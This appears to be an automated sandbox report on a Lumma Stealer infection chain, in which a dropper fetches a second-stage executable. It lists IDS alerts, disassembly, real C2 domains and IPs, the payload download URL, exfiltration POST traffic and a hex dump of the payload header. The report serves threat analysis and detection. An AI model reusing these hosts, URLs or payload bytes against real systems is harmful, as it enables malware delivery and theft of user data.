        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 4x nop then mov byte ptr [esi], al3_2_0099DCBC
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 4x nop then mov byte ptr [edi], cl3_2_0099CCB0
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 4x nop then jmp dword ptr [004455F4h]3_2_009964DA
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-7D4F867Fh]3_2_009864CA
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 4x nop then mov eax, dword ptr [esp+00000080h]3_2_00987C28
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 4x nop then xor edi, edi3_2_00987C28
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 4x nop then mov esi, eax3_2_00985C41
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 4x nop then mov word ptr [ecx], dx3_2_00999444
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 4x nop then mov ecx, dword ptr [ebp-20h]3_2_00999444
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax]3_2_009AF597
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 4x nop then mov byte ptr [edi], cl3_2_0099CD89
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 4x nop then mov word ptr [eax], cx3_2_00998DC8
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx-7D4F867Fh]3_2_009875E7
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 4x nop then cmp word ptr [ebx+edi+02h], 0000h3_2_0098D5E7
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 4x nop then push esi3_2_00997D1A
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 4x nop then mov byte ptr [edi], cl3_2_0099CD37
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 4x nop then mov word ptr [ebx], ax3_2_0098B547
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 4x nop then mov byte ptr [edi], cl3_2_0099CD78
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 4x nop then cmp dword ptr [ebp+edi*8+00h], AF697AECh3_2_00984E96
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 4x nop then cmp al, 2Eh3_2_00996E96
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 4x nop then cmp dword ptr [ebp+edi*8+00h], E785F9BAh3_2_00984E87
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 4x nop then movzx ebx, byte ptr [edx]3_2_009A56B7
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 4x nop then mov ebx, eax3_2_0097DE40
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 4x nop then mov ebx, eax3_2_0097DE40
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 4x nop then mov eax, dword ptr [ebp-68h]3_2_00998FA0
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 4x nop then mov ecx, eax3_2_00985FD3
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 4x nop then mov ecx, eax3_2_009797E7
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 4x nop then mov word ptr [ebp+00h], ax3_2_009797E7
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+68E75405h]3_2_009AEF07
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+18h]3_2_00986F35
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 4x nop then movzx ebx, byte ptr [esp+ecx-75h]3_2_00986F35
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 4x nop then push 00000000h3_2_00999F40

        Networking

        barindex
        Source: Network trafficSuricata IDS: 2058374 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rapeflowwj .lat) : 192.168.2.8:65277 -> 1.1.1.1:53
        Source: Network trafficSuricata IDS: 2058375 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rapeflowwj .lat in TLS SNI) : 192.168.2.8:49707 -> 172.67.220.223:443
        Source: Network trafficSuricata IDS: 2058375 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rapeflowwj .lat in TLS SNI) : 192.168.2.8:49708 -> 172.67.220.223:443
        Source: Network trafficSuricata IDS: 2058375 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rapeflowwj .lat in TLS SNI) : 192.168.2.8:49711 -> 172.67.220.223:443
        Source: Network trafficSuricata IDS: 2058375 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rapeflowwj .lat in TLS SNI) : 192.168.2.8:49706 -> 172.67.220.223:443
        Source: Network trafficSuricata IDS: 2058375 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rapeflowwj .lat in TLS SNI) : 192.168.2.8:49714 -> 172.67.220.223:443
        Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.8:49706 -> 172.67.220.223:443
        Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49706 -> 172.67.220.223:443
        Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.8:49711 -> 172.67.220.223:443
        Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.8:49707 -> 172.67.220.223:443
        Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49707 -> 172.67.220.223:443
        Source: Malware configuration extractorURLs: energyaffai.lat
        Source: Malware configuration extractorURLs: aspecteirs.lat
        Source: Malware configuration extractorURLs: rapeflowwj.lat
        Source: Malware configuration extractorURLs: grannyejh.lat
        Source: Malware configuration extractorURLs: crosshuaht.lat
        Source: Malware configuration extractorURLs: discokeyus.lat
        Source: Malware configuration extractorURLs: sustainskelet.lat
        Source: Malware configuration extractorURLs: necklacebudi.lat
        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 18 Dec 2024 12:49:27 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Wed, 18 Dec 2024 12:45:01 GMTETag: "59e00-6298ac83d9e2c"Accept-Ranges: bytesContent-Length: 368128Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 77 42 b3 41 33 23 dd 12 33 23 dd 12 33 23 dd 12 8e 6c 4b 12 32 23 dd 12 2d 71 59 12 2d 23 dd 12 2d 71 48 12 27 23 dd 12 2d 71 5e 12 5d 23 dd 12 14 e5 a6 12 36 23 dd 12 33 23 dc 12 40 23 dd 12 2d 71 57 12 32 23 dd 12 2d 71 49 12 32 23 dd 12 2d 71 4c 12 32 23 dd 12 52 69 63 68 33 23 dd 12 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 58 67 5f 65 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 f4 03 00 00 2a 3f 00 00 00 00 00 04 1a 00 00 00 10 00 00 00 10 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 30 43 00 00 04 00 00 fd 10 06 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 fc 28 04 00 3c 00 00 00 00 10 42 00 f0 12 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 04 00 90 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 bc f3 03 00 00 10 00 00 00 f4 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 ee 21 00 00 00 10 04 00 00 22 00 00 00 f8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 9c c4 3d 00 00 40 04 00 00 70 00 00 00 1a 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 12 01 00 00 10 42 00 00 14 01 00 00 8a 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
        Source: Joe Sandbox ViewIP Address: 172.67.179.207 172.67.179.207
        Source: Joe Sandbox ViewIP Address: 176.113.115.19 176.113.115.19
        Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
        Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
        Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
        Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49705 -> 176.113.115.19:80
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49707 -> 172.67.220.223:443
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49708 -> 172.67.220.223:443
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49711 -> 172.67.220.223:443
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49706 -> 172.67.220.223:443
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49714 -> 172.67.220.223:443
        Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49704 -> 172.67.179.207:443
        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: rapeflowwj.lat
        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 74Host: rapeflowwj.lat
        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=99VJBESCUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12781Host: rapeflowwj.lat
        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=5TJ6E56H7BJUUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15034Host: rapeflowwj.lat
        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=72ERRQ127ZKUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20195Host: rapeflowwj.lat
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: C:\Users\user\Desktop\InstallSetup.exeCode function: 0_2_004029F4 InternetOpenW,InternetOpenUrlW,GetTempPathW,GetTempFileNameW,CreateFileW,InternetReadFile,WriteFile,CloseHandle,CloseHandle,ShellExecuteExW,WaitForSingleObject,CloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_004029F4
        Source: global trafficHTTP traffic detected: GET /track_prt.php?sub=0&cc=DE HTTP/1.1User-Agent: ShareScreenHost: post-to-me.com
        Source: global trafficHTTP traffic detected: GET /ScreenUpdateSync.exe HTTP/1.1User-Agent: ShareScreenHost: 176.113.115.19
        Source: global trafficDNS traffic detected: DNS query: post-to-me.com
        Source: global trafficDNS traffic detected: DNS query: rapeflowwj.lat
        Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: rapeflowwj.lat
        Source: InstallSetup.exe, 00000000.00000003.1536908197.0000000000CA0000.00000004.00000020.00020000.00000000.sdmp, InstallSetup.exe, 00000000.00000002.3922562911.0000000000C9E000.00000004.00000020.00020000.00000000.sdmp, InstallSetup.exe, 00000000.00000002.3922562911.0000000000C3E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exe
        Source: InstallSetup.exe, 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exe5rjtejk5rytrrSOFTWARE
        Source: InstallSetup.exe, 00000000.00000002.3922562911.0000000000C3E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exeL
        Source: InstallSetup.exe, 00000000.00000003.1536908197.0000000000CA0000.00000004.00000020.00020000.00000000.sdmp, InstallSetup.exe, 00000000.00000002.3922562911.0000000000C9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exeQt
        Source: InstallSetup.exe, 00000000.00000003.1536908197.0000000000CA0000.00000004.00000020.00020000.00000000.sdmp, InstallSetup.exe, 00000000.00000002.3922562911.0000000000C9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exeVt
        Source: InstallSetup.exe, 00000000.00000003.1536908197.0000000000CA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exedt
        Source: C7B4.tmp.exe, 00000003.00000003.1661822214.00000000032ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
        Source: C7B4.tmp.exe, 00000003.00000003.1661822214.00000000032ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
        Source: C7B4.tmp.exe, 00000003.00000003.1661822214.00000000032ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
        Source: C7B4.tmp.exe, 00000003.00000003.1661822214.00000000032ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
        Source: C7B4.tmp.exe, 00000003.00000003.1661822214.00000000032ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
        Source: C7B4.tmp.exe, 00000003.00000003.1661822214.00000000032ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
        Source: C7B4.tmp.exe, 00000003.00000003.1661822214.00000000032ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
        Source: C7B4.tmp.exe, 00000003.00000003.1661822214.00000000032ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
        Source: C7B4.tmp.exe, 00000003.00000003.1661822214.00000000032ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
        Source: Amcache.hve.7.drString found in binary or memory: http://upx.sf.net
        Source: C7B4.tmp.exe, 00000003.00000003.1661822214.00000000032ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
        Source: C7B4.tmp.exe, 00000003.00000003.1661822214.00000000032ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
        Source: C7B4.tmp.exe, 00000003.00000003.1616514614.000000000313B000.00000004.00000800.00020000.00000000.sdmp, C7B4.tmp.exe, 00000003.00000003.1616583872.0000000003138000.00000004.00000800.00020000.00000000.sdmp, C7B4.tmp.exe, 00000003.00000003.1616746499.0000000003138000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
        Source: C7B4.tmp.exe, 00000003.00000003.1616514614.000000000313B000.00000004.00000800.00020000.00000000.sdmp, C7B4.tmp.exe, 00000003.00000003.1616583872.0000000003138000.00000004.00000800.00020000.00000000.sdmp, C7B4.tmp.exe, 00000003.00000003.1616746499.0000000003138000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
        Source: C7B4.tmp.exe, 00000003.00000003.1616514614.000000000313B000.00000004.00000800.00020000.00000000.sdmp, C7B4.tmp.exe, 00000003.00000003.1616583872.0000000003138000.00000004.00000800.00020000.00000000.sdmp, C7B4.tmp.exe, 00000003.00000003.1616746499.0000000003138000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
        Source: C7B4.tmp.exe, 00000003.00000003.1616514614.000000000313B000.00000004.00000800.00020000.00000000.sdmp, C7B4.tmp.exe, 00000003.00000003.1616583872.0000000003138000.00000004.00000800.00020000.00000000.sdmp, C7B4.tmp.exe, 00000003.00000003.1616746499.0000000003138000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
        Source: C7B4.tmp.exe, 00000003.00000003.1616514614.000000000313B000.00000004.00000800.00020000.00000000.sdmp, C7B4.tmp.exe, 00000003.00000003.1616583872.0000000003138000.00000004.00000800.00020000.00000000.sdmp, C7B4.tmp.exe, 00000003.00000003.1616746499.0000000003138000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
        Source: C7B4.tmp.exe, 00000003.00000003.1616514614.000000000313B000.00000004.00000800.00020000.00000000.sdmp, C7B4.tmp.exe, 00000003.00000003.1616583872.0000000003138000.00000004.00000800.00020000.00000000.sdmp, C7B4.tmp.exe, 00000003.00000003.1616746499.0000000003138000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
        Source: C7B4.tmp.exe, 00000003.00000003.1616514614.000000000313B000.00000004.00000800.00020000.00000000.sdmp, C7B4.tmp.exe, 00000003.00000003.1616583872.0000000003138000.00000004.00000800.00020000.00000000.sdmp, C7B4.tmp.exe, 00000003.00000003.1616746499.0000000003138000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
        Source: InstallSetup.exe, 00000000.00000002.3922562911.0000000000C6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://post-to-me.com/
        Source: InstallSetup.exeString found in binary or memory: https://post-to-me.com/track_prt.php?sub=
        Source: InstallSetup.exe, 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://post-to-me.com/track_prt.php?sub=&cc=DE
        Source: InstallSetup.exe, 00000000.00000003.1536908197.0000000000CA0000.00000004.00000020.00020000.00000000.sdmp, InstallSetup.exe, 00000000.00000002.3922562911.0000000000C6D000.00000004.00000020.00020000.00000000.sdmp, InstallSetup.exe, 00000000.00000002.3921516572.0000000000BED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://post-to-me.com/track_prt.php?sub=0&cc=DE
        Source: InstallSetup.exe, 00000000.00000002.3922562911.0000000000C6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://post-to-me.com/track_prt.php?sub=0&cc=DEV
        Source: C7B4.tmp.exe, 00000003.00000002.1819502151.0000000003198000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://rapeflowwj.lat/
        Source: C7B4.tmp.exe, 00000003.00000002.1818378078.0000000000ACF000.00000004.00000020.00020000.00000000.sdmp, C7B4.tmp.exe, 00000003.00000002.1818378078.0000000000B16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rapeflowwj.lat/api
        Source: C7B4.tmp.exe, 00000003.00000002.1818378078.0000000000ACF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rapeflowwj.lat/apij
        Source: C7B4.tmp.exe, 00000003.00000003.1663117027.000000000350A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
        Source: C7B4.tmp.exe, 00000003.00000003.1663117027.000000000350A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
        Source: C7B4.tmp.exe, 00000003.00000003.1616514614.000000000313B000.00000004.00000800.00020000.00000000.sdmp, C7B4.tmp.exe, 00000003.00000003.1616583872.0000000003138000.00000004.00000800.00020000.00000000.sdmp, C7B4.tmp.exe, 00000003.00000003.1616746499.0000000003138000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
        Source: C7B4.tmp.exe, 00000003.00000003.1616514614.000000000313B000.00000004.00000800.00020000.00000000.sdmp, C7B4.tmp.exe, 00000003.00000003.1616583872.0000000003138000.00000004.00000800.00020000.00000000.sdmp, C7B4.tmp.exe, 00000003.00000003.1616746499.0000000003138000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
        Source: C7B4.tmp.exe, 00000003.00000003.1662866086.00000000032EA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
        Source: C7B4.tmp.exe, 00000003.00000003.1663117027.000000000350A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.0JoCxlq8ibGr
        Source: C7B4.tmp.exe, 00000003.00000003.1663117027.000000000350A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.Tgc_vjLFc3HK
        Source: C7B4.tmp.exe, 00000003.00000003.1663117027.000000000350A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
        Source: C7B4.tmp.exe, 00000003.00000003.1663117027.000000000350A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
        Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
        Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
        Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
